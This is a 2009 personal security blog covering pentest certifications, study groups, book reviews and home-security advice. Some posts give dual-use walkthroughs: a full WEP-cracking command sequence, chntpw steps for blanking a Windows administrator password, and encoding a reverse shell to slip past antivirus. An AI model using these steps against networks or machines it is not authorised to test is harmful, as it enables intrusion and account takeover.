Sunday, December 27, 2009

Posting slow down

So I think I have fallen into the same pit that many do with keeping up on a blog. Too many things going on and not enough time in the day. I wanted to post an update and hopefully resolve to update more often :)

So I have been reading a bunch on malware analysis. I have found myself doing this more and more at work. I really enjoy the process, which has led me to dissect the topic. The last book which I just finished was "Malware Forensics: Investigating and Analyzing Malicious Code". The book was written well. The idea of it was that you had two incidents that you were investigating. One was on a Windows machine and the other was on a Linux machine. It then took you step by step into each.

The one thing I would probably offer in the way of criticism of the book would be to finish the Windows portion, then do the Linux portion. I found it difficult to keep my mind focused when it would switch from chapter to chapter. I would find myself wanting to skip to the next Windows or Linux section to see what happens next.

Now I am reading The Art of Computer Virus Research and Defense. This book is a little dated but contains great material about how viruses work. The most interesting thing I see is probably that Peter Szor was talking about the need to protect Javascript in Adobe applications, or types of worms called Octopus in which multiple systems communicate together to perform an action. These are things that are current, in some cases only in the past month or two, and yet here they are written about in full detail years ago.

If I learned anything about this topic so far in this book, it is that virus writers are so far ahead, it's no wonder Anti Virus programs are so easy to beat. The techniques of the good virus writers (good as in ability, not in motive) are light years ahead of the people that probably defend these systems every day. I don't mean to say this to take away from any system, network or security admin out there, but they seem to have a large leg up.

We talk a lot about education being the key to winning this battle. I agree with this, however, I feel that the real education needs to come from the people protecting these systems, more than end user education. Now before I get flamed, I'm not saying that end user education isn't important as well; I'm just saying that if the people that know and understand these systems don't understand the vectors of attack, how can we expect end users who just expect things to work to understand the techniques?

In closing, the plan to meet every Saturday starting on the 16th of January to go over the Metasploit framework course offered by Offensive Security is still on. It will be at the Bowie, MD library. If you haven't received the dates please just contact me at nospamcshaffer which is at the gmail.com mail service. Of course remove nospam for the real address.

Sunday, October 18, 2009

Security for Small Businesses

Most small businesses see IT security as a threat that doesn't really target them. I was over at the NIST website today and stumbled on some information they released for Cyber Security Awareness Month, which is this month if you didn't know :) The video was decent and brought up some good stats that I think any small business should listen to. A large percentage of small businesses experience laptop theft, insider abuse, virus infection and bot infection.

The page points out that, taken one at a time, small businesses are small targets. However, when you take into account that small businesses make up, by their figures, 95% of businesses in America and 50% of the nation's gross national product, that isn't so small, is it? Control of that could be quite devastating to the whole country.

They have released a 20 page guide outlining common things small businesses can do to help secure their networks. If you want a copy of this, or just want to watch the video, you can find them at the following links:

Article

Video

Security Document

SMB Security Page at NIST

Saturday, October 10, 2009

Security Group Study

Calling anyone interested in security in the Washington DC area! I am trying to get a group together to have a group study effort to sharpen our general security and pentesting skills. I plan on finding a place where we can meet and go through the Offensive Security Metasploit Unleashed course. I think it will be a good way to get an introduction into general security as well as pentesting, but it will also help some who may know this already sharpen or keep their skills sharp. I have not decided on a place to have this yet. I would like it to be as central as possible to the metro area so it's as convenient as possible for everyone interested. If you have ideas for meeting places let me know.

The fee for this group effort will be a $4 donation to Johnny Long's Hackers for Charity per the request of Offensive Security. Depending on the venue we may need to purchase drinks/food or some other item if, for example, we end up at a Starbucks. If we can find a free place, that's great. I would like to have Internet available if possible, but hey, we're hackers, I'm sure we can figure that one out :)

What do I need to participate?

Technically nothing. If you want to get the most out of it, being that this will be a meeting where a desktop will probably not be available, you should have a laptop that can run some virtual machines. The Offensive Security group has the requirements for the class here:

Lab Requirements

With that said, I have my laptop and one other I can bring. If anyone has extra laptops they can bring to the group meeting for people to use while they are there, that would be great. It will be more than just the lab as discussions will be a majority of the time. Thus, even if you don't have the gear, you will still learn a ton.

I will post again when more details are available. If you are interested please let me know by emailing me at pleasedontspam-cshaffergmailcom (remove the pleasedontspam- and of course add the @ and the . in their respective places :P)

Also if you are part of mailing lists or groups in the area, pass the info around.

New Blog

I have created a new blog. A new blog you say? We barely read this one :). This new one is more professional in nature. It is the beginning of a new open source community creating custom IPS signatures for Symantec Endpoint Protection. So the good news is, unless this is something you are interested in you can still get my normal great content here :). If it is something you are or may be interested in check it out!

Open Source SEP Signatures

Sunday, October 4, 2009

My Anti Virus will keep me safe and warm! Won't it?

I am always being asked what the best Anti Virus is. This is a difficult question. The truth of it is, they can all be beaten. I know that might come as a shock to you, maybe not, but it's very true. I decided to take this post and try to explain why this is difficult.

What I have done is created a simple backdoor trojan using our favorite Metasploit shell_reverse_tcp. I encoded it with shikata_ga_nai. Loosely translated this is Japanese for "nothing can be done about it". This method basically utilizes a polymorphic XOR additive feedback encoder. (For those unfamiliar with the term, this means it has the ability to change the bytes of the file in what appears to be a random fashion while keeping the same behavior.)

This is a simple shell code. It has a specific purpose: to connect back to any system I tell it to. This should be caught by any normal means. I encoded one version with shikata_ga_nai and built one version with no encoding. I uploaded both to VirusTotal. This site scans the files you upload with 41 (at this time) different virus scanners and lets you know which ones found them malicious. Both versions were said to contain no malicious code. Now this could be an unfair test as it was simple code, so I decided to encode Netcat both ways and run that through. For those of you that are not familiar with Netcat: it is a back door program that can be used for good or bad but is definitely seen by major vendors as malicious. I again ran this through VirusTotal and the unencoded version was caught by 25 of the 41 vendors easily. The version I encoded was not recognized at all.

So what does it all mean, Basil? It means that even all of those old viruses can get past your anti virus. What you really need is an endpoint protection product from companies such as Symantec, McAfee or Sophos. Why are they better? Because they are created to look for "odd" behavior rather than just a signature of the file. This is becoming more and more important as attacks and attackers are getting more complex.

For those of you that will still use the free anti virus programs out there, do what you can to keep them up to date and scan your systems often. Microsoft has released a free version of Anti Virus. You can get it here: Microsoft Security Essentials. Make sure you are downloading this from the Microsoft web site! There are many fakes out there already. I have not tested it fully, but the little I have tested it shows that it is pretty decent for free. It would be nice to run multiple anti virus programs but usually they fight with each other. I am testing this one with AVG on my wife's PC and will report back if they work well together or not. I also recommend running Malwarebytes as often as possible. Especially if you are a constant Facebook or Myspace user. Running it nightly might be a good choice.

As always, if you have any questions, let me know.

Tuesday, September 29, 2009

Forgot that Windows password?

So there are many ways to retrieve that lost Windows password. I just wanted to share this for those that might run into some problems that I have seen.

So you might run into a situation where you need to reset the local administrator password on a Windows box. You might reboot into something like NT PASSWORD. Now comes the problem. You boot into this and it doesn't want to mount your drives or doesn't seem to want to find the SAM file. I did notice this happens more often when the system has been shut down improperly. To fix that issue, just reboot into safe mode. This will normally let you shut down properly. You might have to do this more than once. If that still doesn't work, have no fear:

Boot into Backtrack. After you're booted up, check your mounts with the mount command. If you see your Windows system partition, you're set; if not, you should try to mount it with the following:

ntfs-3g /dev/sda2 /mnt/sda2 -o force

That should mount your drive. It does expect that your Windows partition is sda2. If it is not, put your value here. If you don't know, check your logs and dmesg to see what it might be.

After it is mounted cd into the /pentest/password/chntpw directory.

Run the following:

chntpw -l /mnt/sda2/WINDOWS/system32/config/SAM

This should list the users that exist in the SAM file on the local system.

To change the password do the following:

chntpw -u Administrator /mnt/sda2/WINDOWS/system32/config/SAM

*Note: If your username happens to contain a space put it in quotes*

This will present you with some options as to what to change. Choose to blank out the password. You can also set it, but I have found blanking it to be the easiest. You can set it to what you want once you get the box back up.

After you modify the password, write your changes. This may ask for you to run a disk check after you reboot. Skip this on the first boot. Change your password after it comes back up then you can reboot and let it do what it wants.

This isn't an exact step by step. It is taking into account that you have Linux experience and some familiarity with password reset procedures. I just wanted to share this because I have seen admins feel like they are out of luck after NT Password does not work. Have no fear! You do have another option.

Monday, September 14, 2009

WEP Y?

Wow! It is truly amazing just how many people still use WEP. I'm not going to go on a huge rant about this but if you are using it STOP! People often say, well it's better than nothing. I say not really. The reason I say this is because it gives you a sense of security that is false. Others say "but I don't have anything anyone would want". I say there are millions of identities stolen from home computers. Most wireless access points have WPA, use this. If it has WPA2 then that is even better. In the "it's better than nothing" category, I would say WPA is here with WPA2 being the best at this time for home use.

With that in mind, I thought I would show how easy it is to crack WEP in a few simple commands and the right, freely available, tools.

*Disclaimer: Please remember not to use this for nefarious purposes. This is informational only. Do it on your own access point as a proof of concept or make sure it is in your rules of engagement for a penetration test for a client.*

I will not be held liable for any misuse of this information!

Cracking WEP

1. Download the tools:

Backtrack 4

2. Boot into the Disk

3. Find a good target by running the following command:

airodump-ng wlan0 (just run airodump-ng by itself to find your interface name, mine happens to be wlan0)

4. Write down the BSSID, ESSID, and channel of the AP with the strongest signal (this one is normally near the top of the list)

5. Lock onto the target with the following command in a new terminal window:

airodump-ng -w wep -c 11 --bssid 00:00:00:00:00:00 wlan0 (here -w wep sets the prefix of the capture file that will be written, -c is the channel, in this example it is 11 but enter the value you saved in step 4, and the bssid will not be all zeros either; enter the BSSID you wrote down in step 4 in the same format as the zeros)

6. Attempt association to the AP with the following command in another terminal window:

aireplay-ng -1 0 -a 00:00:00:00:00:00 wlan0 (here again the bssid should not be zeros but the value you have from step 4)

7. Hopefully your card supports packet re-injection. This basically means when it finds some interesting traffic that it can recognize, it will replay that packet back into the network and make this process much faster. Do this step by typing the following in yet another terminal window:

aireplay-ng -3 -b 00:00:00:00:00:00 wlan0 (Remember not zeros but the step 4 BSSID here)

8. Once you see the "data" section get to somewhere between 20K and 30K you should be good to go. Do an ls -la to capture the file name that was created. It is the file with the .cap extension.

9. Armed with that information run the following command to crack the WEP key

aircrack-ng filename (remember it should look like wep02.cap or something else with the .cap extension)

This final step is the quickest. Depending on if your wireless card supports packet re-injection, it could take a while to capture the needed traffic to get the pieces you need to crack WEP. If your card is fully supported with re-injection, this will probably take no more than 15 minutes as an average. You can run the crack command at random intervals during the capture process to see if you got it yet, though I recommend just waiting until you get 20-30K data numbers. I haven't seen it really work with less than that. Not saying it doesn't, I just haven't seen it.

So there you have it. Scary huh? It is. Please remember not to use this for nefarious purposes. This is informational only. Do it on your own access point as a proof of concept or make sure it is in your rules of engagement for a penetration test for a client. I didn't give you this so you can go cracking your neighbor's wireless connection :)

Monday, August 24, 2009

Personal Identification Disclosure

So I have been looking to rent a new place as I moved back to the DC metro area. What I have found is an excessive number of people that are asking for a ridiculous amount of personal information. They are asking for my SSN, checks (which would obviously include account and routing information), and I even had one person asking to set up the ability for them to auto charge my account for the monthly rent and yet another asking for a photocopy of 2 picture IDs and my SSN card!

I have probably found myself looking for this stuff more and more lately but I find this outrageous. My general question is: Am I being over paranoid or is it correct of me to deny them these things? It's bad enough that I need to keep thieves from gaining access to this via my personal space, but now I need to rely on these people, most of whom are arguably ignorant about computer and general security, not getting hacked and exposing my information.

What ways are there to get around this? Obviously I see their side of wanting this information, but they should understand this side as well. Explaining this to them is quite difficult though unless they have been a victim of such a crime. I thought about running the credit checks myself and scrubbing the information and just denying the existence of a personal checking account. Any other suggestions?

Tuesday, August 18, 2009

SANS 560 anyone?

I was extended an invitation to become a SANS mentor. This means I will be running some classes real soon. I will be starting with offering the 560. This is the class you would take to obtain your GPEN certification. Time and place to be announced soon. If you are interested, drop me a line and let me know. I'll get you on the list. Here is the link of the course and what is included:

SANS 560

I Can't hear you now! :(

You read that correctly. I was unable to get a good test with the bluetooth hacking this weekend. The reason? It appears that when you pass your bluetooth through to a virtual machine on your Mac, you lose a lot of the needed functionality. Yes, yes I know. You are thinking why didn't you just get carwhisperer to work on the Mac or try the Windows route, or boot your Dell into Backtrack?

The truth is that I wanted to see it work this way. I really like the idea of having one laptop that can do everything I need to do with the use of VMWare. Alas, this is not the case yet; at least not without getting external wifi and bluetooth dongles. I will attempt again this weekend with the Dell and Backtrack.

I did find something else interesting though....the PS3 has bluetooth. My goal may be to see what kind of cool stuff I can do there as well.

Friday, August 14, 2009

Can you hear me now?

OK, OK my posting has been a bit spotty. I'm trying :) So anyway, why I am posting today.... Can you hear me now? Reminds you of a Verizon commercial. Well, this post has to do with...well cell phones, and bluetooth headsets. You may have all been reading how vulnerable bluetooth is. Do you know just how vulnerable? Check out the following video by Josh Wright:

I Can I hear you now!

So how scary is that? Bet you will think twice about wearing one of those bad boys now :). That got me thinking, and those of you that know me know how that goes! If we can eavesdrop/inject on bluetooth headsets then I bet we can eavesdrop/inject on car bluetooth systems. Well...I hope to test this tomorrow and see. I'm traveling back from PA in the AM and will have a few hours at my disposal. If for some reason I am too tired, it will be done this weekend and I will post my results here. This can have a very scary outcome. Let's hope more thought was put into the car bluetooth setup though...yeah right!

Monday, July 20, 2009

Passed the GPEN!

Just wanted to share that I passed the GPEN exam! Got a 90%. It was one of those exams that showed you your progress. This was a blessing and curse. It was nice to know I passed after getting 105 questions correct, but since I knew I passed at that time, it was easy to slack off toward the end and I missed a number of questions because of it.

I put in my application for my GPEN gold. The paper title is: "Identifying Load Balancers in Penetration Testing". The application was approved. I will begin work on the paper starting around the 10th of next month. It is a 6 month process so more to come on that. I have a lot of work ahead of me.

In the meantime, still being on track with my certification goals, I began studying for the CISSP yesterday. I hope to have it done before the year's end. (If anyone else is studying for this one as well and would like to get together online or in person to study, let me know.) That was the goal I set forth. Then in the beginning of next year I will be finishing my GPEN gold paper and starting to get ready for the GSEC towards my GSE.

Friday, July 10, 2009

XSS?

Where have you been Curt? Well as some of you may know I'm getting real close to taking the GPEN certification exam. Next week in fact! So I have been trying to study hard and keeping focused. I did want to give you guys a new post though to ensure you that I'm still here and still plan on keeping up on my musings.

Have you heard of XSRF? You might have heard it called cross site request forgery. This is a dangerous attack vector that people can use to do all sorts of nasty things. Take for example, this cool picture of cookie monster:



What picture of cookie monster you might ask? You may see nothing above or you may see a little white box with a red x in it or a box with a ripped file inside. You see, what just happened is I executed a bit of code for your system to run. What code? Well if you had a bank account with my bank, I would have just transferred $13000 from your account to mine :) Thanks! There are some things that would need to be in place for this to happen though.

What I would need to do is have you look at this blog posting while you were logged into your online banking. This isn't that difficult as a lot of people multi task. You may say "but I don't normally browse when I bank". That is fine too. I can also use this code to have your browser send a command of my choosing to any site you may be logged into at the moment, e.g. changing your Facebook, Myspace, or eBay password so I can hijack it.

Why would the other page accept this junk? The short answer is that it does this because I use your cookie (or session) to tell it what to do. Since you authenticated to that site, it thinks you are requesting this information so it subserviently obliges.

Why all of the bad news? Well I want you all to be aware of the things that can happen very simply on the Internet. The good news to this is that websites such as your bank, ebay and others are doing all they can to help stop this. It is an uphill battle though so don't expect it to end completely. As long as there is crime in the world there will be people coming up with new ways to steal your information.

How can we protect against this, Curt? Again, this is difficult to say because the dynamic changes all of the time. One thing that would help here is to turn on, or off, the setting in your browser to not allow third party images. In Firefox there is a setting you can disable called Load images automatically. IE 8 actually has a nice new feature that allows you to block third party images from a website, much like how I ran the code above. This may cause issues with your page displaying properly. I guess it's about how far you want to go. Alternately you can choose the option to clear cache, cookies and offline content every time you close your browser. This does mean you will have to log in every time you visit those types of sites that require it. You can also close your browser and reopen it after doing online transactions and logging out of those pages. It does seem that more and more pages of this sort are providing you with that request when you log off already, which is a good thing. That clears the session, and if you are clearing your cookies and such on exit then it takes the option away from the attacker.

Be safe on the Internet. It's not a land of milk and honey! It's a warzone where many unsuspecting people get caught in crossfires and direct attacks. You can enjoy the convenience and productivity that it brings, just be cautious. As always, if you have any further questions, let me know!

Wednesday, June 17, 2009

Mentioned on another blog

Some of you may know, but then some of you may not. Yesterday I was mentioned on the CommandLine kung fu blog. Now it was no big deal, like a new sploit found or new rockin' code, but it's nice to be mentioned and associated with individuals such as Ed Skoudis and the other folks that maintain the blog. I submitted a question/suggestion for them to discuss command output redirection. They did an excellent job in covering the material and I hope a lot of people learned as much from it as I did! Thanks guys!

I did not get to testing the new l0phtcrack this weekend. I ended up playing with my Mac the whole time :) I'm just about completely over to it now. I'm giving Entourage a try over Outlook. So far it's not that bad. The only issue I have remaining is that the SANS @home sessions will not play on my Mac. I have a ticket open with them to try to fix this. It's not a show stopper though as I have VMWare Fusion installed and running Windows 7, which runs the sessions fine. So long story short, I hope to get to testing soon. I'm tied up at work all weekend this weekend but maybe during my downtime I can see what I can do. I'm also trying to go through the SANS 560 and 561 class materials one last time before taking the GPEN test. My hope is to take it in the middle of next month so I can get started on my CISSP.

More later, hopefully a full review of l0pht vs. some of the other free password crackers out there!

Thursday, June 11, 2009

Life on a Mac

Well, I finally got my new Mac. In short, I'm really happy with it. I haven't had much time to actually play with it because of other things I have needed to do. So far though I am very happy with it. Yes happy enough that I will probably not purchase a PC laptop for the purpose of my personal use again! I have converted.

The major thing I'm trying to figure out is which way to go with virtualization. I have installed Parallels because I have seen some interesting things as far as its interaction with the OS. Being able to just launch necessary Windows applications from the system and have them in a window like any other app is nice. I'm a big fan of VMWare so Fusion is obviously my other choice. I have a 14 day trial of Parallels and then I will attempt a trial of Fusion. I'm going to give them both a shot before I make my decision. With that said though, my complete move to the Mac is not done yet. I still have the Dell close at hand. Mainly all of my email is in Outlook and my bookmarks are still on there. I do have data which needs to be moved still as well but those are about the only reasons I'm not completely switched.

I have not moved Outlook over because I am not sold on a particular virtual application yet. I know Mac has the built in Mail client, maybe I'll switch to that too but I'm not sure yet. I chose to install Windows 7 in the virtual environment. So far to me it is pretty much Vista. It does seem to run well and there are some dialog box changes and some sort of change in workgroup that makes it almost seem domain like with a password for access and such. All of that investigation will be for another day. Anyway, short post, I just wanted to update. I still have plans on testing out the password tools this weekend and I will post the results here.

Monday, June 8, 2009

L0pht iz Back!

You read it correctly. The great password cracking tool is back in action. Many of you may remember this tool. It worked great and I know a lot of people that had it previously that still use it to this day. The tool was created by the L0pht team some years ago. This was purchased by @stake, which was then purchased by Symantec. For some reason at that time the tool disappeared from availability. This was a sad time in password cracking history. The good news is that it is now back and better than ever. I haven't installed it yet, as you may know I'm due to get my new Mac today and will probably reinstall this laptop with Windows 7 to get better performance. From what I am reading though, some of the new features are:

"
L0phtCrack 6 is packed with powerful features such as scheduling, hash extraction from 64 bit Windows versions, multiprocessor algorithms, and networks monitoring and decoding. Yet it is still the easiest to use password auditing and recovery software available.

Password Scoring
L0phtCrack 6 provides a scoring metric to quickly assess password quality. Passwords are measured against current industry best practices, and are rated as Strong, Medium, Weak, or Fail.

Pre-computed Dictionary Support
Pre-computed password files is a must have feature in password auditing. L0phtCrack 6 supports pre-computed password hashes. Password audits now take minutes instead of hours or days.

Windows & Unix Password Support
L0phtCrack 6 imports and cracks Unix password files. Perform network audits from a single interface.

Remote password retrieval
L0phtCrack 6 has a built-in ability to import passwords from remote Windows, including 64-bit versions of Vista, Windows 7, and Unix machines, without requiring a third-party utility.

Scheduled Scans
System administrators can schedule routine audits with L0phtCrack 6. Audits can be performed daily, weekly, monthly, or just once, depending on the organization's auditing requirements.

Remediation
L0phtCrack 6 offers remediation assistance to system administrators on how to take action against accounts that have poor passwords. Accounts can be disabled, or the passwords can be set to expire from within the L0phtCrack 6 interface. Remediation works for Windows user accounts only.

Updated Vista/Windows 7 Style UI
The user interface is improved and updated. More information is available about each user account, including password age, lock-out status, and whether the account is disabled, expired, or never expires. Information on L0phtCrack 6's current session is provided in an "immediate window" with a reporting tab providing up-to-the-minute status of the current auditing session."

To learn more check out their page at L0phtCrack. I'm going to run some benchmarks on this guy this coming weekend. I'm probably gonna put it up against Ophcrack and John the Ripper. Unfortunately, I do not have a 64-bit machine to test with but the new Mac is multi core so we can see how much it can take advantage of it. That is if it runs well in a virtual environment as I don't see a Mac version.

Thursday, June 4, 2009

iPhone fun

OK so it has been a while since I have posted. As some of you may already know, this is mainly because I am working back in the DC area. I am on a couple week contract as surge support in a NOC move. We shall see what happens after that.

So while on this contract I was given an iPhone so I can be contacted. I found this a great chance for me to see just how cool it was. Sure I have played with them before but not for the length of time that I have it for now. So far, I'm a fan. There are a lot of little cool apps that I find handy. It seems that the free ones have their downfalls sometimes but heck, some of the good ones are only 99 cents! The best thing I have experienced with it is web browsing. I have a Samsung Omnia, which was as close as I could get to an iPhone on Verizon at this time. I like the Omnia but to be honest web browsing isn't easy enough to make me want to do it all of the time. It's a nice to have feature that I have used but mainly I use it for email and tethering. For those things, it rocks.

The iPhone, however, makes browsing a fun experience. It is so useful that I do it all of the time now. I attribute this to the way the browser resizes. Opera mobile has some of this ability but nowhere near the level that Safari does on this guy. It's also helpful to have a normal headset jack. The Omnia requires an adapter which is a pain to carry. This guy just plugs up with your normal earbuds which makes it much more attractive. With that in mind, it makes me want to listen to more podcasts like the SANS storm center daily and pauldotcom weekly. I also purchased a nice RSS reader that imported my OPML list of RSS feeds. The reader formats it nicely and keeps me busy when I'm waiting for stuff.

Overall I'm happy with the device. I'm not a fan of AT&T still as I have complete dead zones on the phone when my Omnia is happy tethering me away at full 3G speeds. I will say though, if Verizon does get to offer the iPhone next year, I'm on it.

Friday, May 29, 2009

Hackers Don't Want my PC

Many people would tell you this when the subject of protecting your home system comes up. Is this true? "I don't bank online", "I don't shop online"; people say all of these things in defense of why they believe they are safe. Is that true? Not at all! Even if you don't have anything they want along those lines, you have something very valuable: your PC sitting idle all night, normally on a broadband connection. This is most likely more valuable than your personal eBay account or that credit card that you have, which is probably maxed out anyway :).

Your idle CPU cycles are great for lots of things. Sending SPAM, herding other bots in a botnet used for many purposes, housing stolen software or music and the list goes on and on. I stumbled on this article from the Washington Post via Slashdot:

The Scrap Value of Hacked PCs

If anyone says no one would want their PC you can tell them the stuff you read here or better yet, give them the link to read it for themselves. The article is very brief and doesn't get technical at all really but it gets to the point. No PC is safe!

How can you protect your machine?


1. Get a good Malware tool for protection and removal.

I recommend Malwarebytes. Download the free trial version. The trial is fully functional; you just do not get real time protection. What that means is that it will remove Virus/Spyware/Adware etc, but it doesn't run in the background to protect you from getting it in the first place. Thus, you should think of getting one that runs real time as well. Using multiple vendors is not a bad idea. The truth is that sometimes one may come out with a new definition quicker than another.

2. Get and keep your Anti Virus applications up to date.

There are many free antivirus applications out there. I would not recommend ClamAV here because at this time there is no real-time protection. It is a good AV solution for network appliances that can use it in real time, not yet for the home user in my opinion. I have a friend in Canada that is working on a real-time engine for it for his Masters project. He anticipates having it ready in the next year or two. I use AVG and have come to like it. I would recommend paying for a program though. The reason is that most of these free ones rely on definitions. The problem is that there are encoding techniques that will bypass 90% of antivirus programs today. What this means is that you can be infected with the oldest virus known to vendors again because it appears different to your application. Thus you should purchase an antivirus program that includes what is called IPS (Intrusion Prevention System). These types of antivirus programs work on unusual system functions rather than only definitions. I also recommend Symantec. Many people will tell you they don't like it, and we are all entitled to our own opinions. I have found it to be one of the better ones out there in my opinion. Others would tell you McAfee. I have not had good luck with McAfee and thus don't recommend it, but your mileage may vary.

3. Protect from the network

For those that might be a little more technically inclined I also recommend Untangle. Look for their option called the "Re-Router" technology. This is an excellent network appliance that provides high-level protection. The Re-Router option they have is really nice, as you just need to install it on one of your Windows PCs that is connected via Ethernet cable to your switch/router. This one system then provides protection for every computer in your house. It is NOT a replacement for your antivirus/IPS system on the host, only an addition to it. I assist in the development of new features for this device so I may be a bit biased :), but it is a very nice set of applications.

4. Keep your applications and operating systems up to date.

Run your Windows, Mac or Linux updates as much as possible. If you have an automatic method, use that. Don't forget your third party applications as well. If you read my post from the other day, this can be dangerous so use caution. Read my post from a few days ago to learn what you can do to keep this from backfiring on you. But by all means do the updates! Attacks come from vulnerabilities in applications probably more than any other method. Keeping up to date on this stuff makes it harder for them to gain control in the first place.

5. Don't underestimate the power of shutting down your computer when you are not using it. Maybe even shut off your router or modem. If you don't need it on, then don't have it on. This is especially true if you are going on vacation or something.

If anyone has any other Security/AV questions or needs assistance in any of these applications feel free to email me. I offer general security consulting for free and do not mind in helping out. Yes that goes for businesses as well as home users!

This is by no means an exhaustive list of things you can do. It is just some examples to get you started. I love security and do security for the fact that I believe computers, networks and the Internet should be and remain a good and fun tool for us all. I hate that we have to be so cautious and in some cases don't use it at all because of the threats out there.

Tuesday, May 19, 2009

When is there an incident?

I just wanted to post this as a question to those that do read this blog, all 2 of you :P. I had a discussion with a security admin the other day. They wanted me to take a look at their incident handling document. This document outlined the steps that they would take in the case of an incident. Now don't get me wrong, the document was spot on I believe. It was well written and you can tell a proper balance of technical and informational data was found. What this did bring up in my mind is: when has an incident, specifically a compromise, happened such that a process like this needs to be put into action?

I realize there is a balance that needs to happen because if we did this same routine for every system infected with a virus, management would probably start to not trust things are going well (little boy crying wolf). What about a bot though? If you are not familiar with bots, you can read previous posts I have put on this blog or just Google the term and you should run into a ton of information. Long story short is that bots are used to control systems. The problem that I see is that a lot of companies downplay the significance of a bot. Just because at this time that bot is only popping up ads on your PC doesn't mean the attacker has any less than full control of your system. In my mind, a party outside of your network, often unknown to you, has full control of one of your systems. That sounds like a compromise or incident to me. It only takes one update from the bot's command and control center to turn it into something much more horrifying.

Now there are controls in place like IDS and IPS systems which can often block and alert on the existence of such software. This is a good thing. The question is though, should this be treated like an incident of compromise, or should it be quietly removed and cleaned up because it was caught so early? I guess a third option would be to have a non-management-alerted incident handling process in place as well. Not that we want to cover these tracks, but for the security admin to keep track of, and possibly release at some quarterly meeting saying "we had x many major incidents and y many minor incidents". It's an interesting thought to find that balance. I would love to hear some opinions.

Automatic Updates

So you are a good user that does their software updates, right? Windows Automatic Updates are turned on and going. How about those third-party applications like Java, WinZip, iTunes or even Notepad++? You have those automatically update, right? What you are about to see will probably cause most of you to run over and shut those down now! It's quite scary. While the attack is relatively simple as far as technical aspects go, it seems to me that it can be a way to get into systems that you would think not possible otherwise, due to the diligence of some users in updating their applications.

Evilgrade

Here is a demonstration from John Strand:

John Strand's Evilgrade demo


It looks, works and feels like Metasploit. This just goes to show that we need to verify updates with checksums on the software company's website, if they offer one. If not, we should be testing them in a lab to see how they react first. This even goes for those of us distributing these via something like SCCM or Shavlik. Keep your eyes peeled for these types of things! People get very sneaky when you have a resource they want.
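The post's advice is to compare the downloaded file against the vendor's published checksum. Here is an added example of that check (my own code, not from the post, from John Strand or from any vendor) in Python. The sample payload and its "published" digest are constructed for the demo; the digest is simply the SHA-256 of the bytes `b"abc"`. In real use the published value would be read from the vendor's site over HTTPS, and never from the same channel the installer came down, since an on-path attacker who can swap the installer can swap an accompanying checksum file too.

```python
import hashlib
import hmac
import os
import tempfile

# Constructed sample "update" payload and the digest a vendor would publish for it.
# (SHA-256 of the bytes b"abc"; in practice the digest comes from the vendor's
# download page, fetched over HTTPS, never from the same download channel.)
SAMPLE_UPDATE = b"abc"
PUBLISHED_SHA256 = "ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad"


def sha256_bytes(data):
    """Hex SHA-256 of an in-memory byte string."""
    return hashlib.sha256(data).hexdigest()


def sha256_file(path, chunk_size=1 << 16):
    """Hex SHA-256 of a file, hashed in chunks so a large installer need not fit in RAM."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_update(path, published_hex):
    """True only if the file's SHA-256 equals the published digest (case-insensitive)."""
    actual = sha256_file(path)
    # compare_digest does a constant-time, full-length comparison (no prefix matches)
    return hmac.compare_digest(actual.lower(), published_hex.strip().lower())


def demo():
    """Write the genuine payload and a tampered copy to a temp dir and verify both."""
    with tempfile.TemporaryDirectory() as d:
        good = os.path.join(d, "update.bin")
        bad = os.path.join(d, "update_tampered.bin")
        with open(good, "wb") as f:
            f.write(SAMPLE_UPDATE)
        with open(bad, "wb") as f:
            f.write(SAMPLE_UPDATE + b"\x00")  # one extra byte is enough to change the digest
        return verify_update(good, PUBLISHED_SHA256), verify_update(bad, PUBLISHED_SHA256)


if __name__ == "__main__":
    genuine, tampered = demo()
    print("genuine update verifies:", genuine)   # True
    print("tampered update verifies:", tampered)  # False
```

A checksum only proves the file is the one the vendor hashed; if the vendor also offers a detached signature (PGP or Authenticode on Windows), checking that is stronger because the signing key does not travel with the download at all. For the SCCM/Shavlik case, run the check on the package before it goes into the distribution point, not on each client.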

Monday, May 11, 2009

On the Ruby wagon

So I started taking a look at Ruby this past week. So far it seems pretty easy. It is an interesting method for a language. From what I am reading, one of the goals was to make it read like real sentences. Why did I bother to start looking at it? Mainly because Metasploit consists of a lot of Ruby. It appears that it is moving in this direction from Perl. There are some other applications that I have been looking into that use it as well. With all of the other stuff on my plate, I'm not sure how far I'm gonna get with it any time soon. Here is a good book that I am going through to learn it. The author has an interesting style which makes it easy to read:

Why's (poignant) guide to Ruby

Friday, May 8, 2009

Certification Roadmap

So after my post the other day, I started thinking long and hard about where I want to go professionally, specifically in regards to the vehicle of which certs to focus on to get there. After that process here is my plan (for those that care :))

I'm finally going to schedule my GPEN for the 18th of next month. My next goal is to obtain my CISSP by the end of the year. There is an exam being held in Atlanta on December 19th. My goal will be to get it at that time. I will probably take some time off from then until the end of the year. Starting Jan. 1st of next year, I am going to focus on getting the GSEC certification. Following that, GCIA, then finally GCIH. I would like to have all three of those done by June of next year. The reason is that I would like to have two gold papers done for two of those certifications by the following summer so I can shoot for the GSE.

Why the timeline? Well, you have a time limit of 6 months for each of your gold papers. This gives me the full 6 months even if I can finish them early. Why do the gold papers? The simple answer is that they are prerequisites for the GSE certification. For those of you that are not familiar with the GSE, the exam is only held once a year. At this time there are only 13 people with this certification. It is a rigorous process. After the prerequisites and acceptance to take the lab exam, the process includes a multiple choice exam covering a wide variety of topics, much like the other GIAC exams. The second part is a two-day hands-on lab. The lab consists of a rigorous battery of hands-on exercises drawn from a large range of security domains. The second day consists of an Incident Response Scenario that requires the candidate to analyze data and report their results in a written incident report as well as an oral report.

In short it covers the following skillset:

  • General security skills
  • Incident handling skills
  • Intrusion detection and analysis skills

On the journey I go! It will be a long process but I hope to learn a lot and to possibly set myself a little outside of the pack in the quickly filling security field. I welcome any and all study partners that may have the same or similar goals. Group study is much better than personal study. I will probably start a website and mailing list much like GroupStudy but security focused. Keep your eye out or email me for more information on that.

Sunday, May 3, 2009

Summer Reading List

Some of you may know that I have been trying to compile a list of books to go through. I have attempted to create a sort of "book club" to get a bunch of people together to go through them, sharing what we all have learned. That didn't take off too well. I started with Hacking: The Art of Exploitation. This was an excellent book. I learned a lot! It is not for the faint of heart though. Get ready to dig into some serious C code. It definitely makes me want to go back and dust off what I remember of C and learn it again. At that time, I may reread the book in an attempt to get even more out of it.

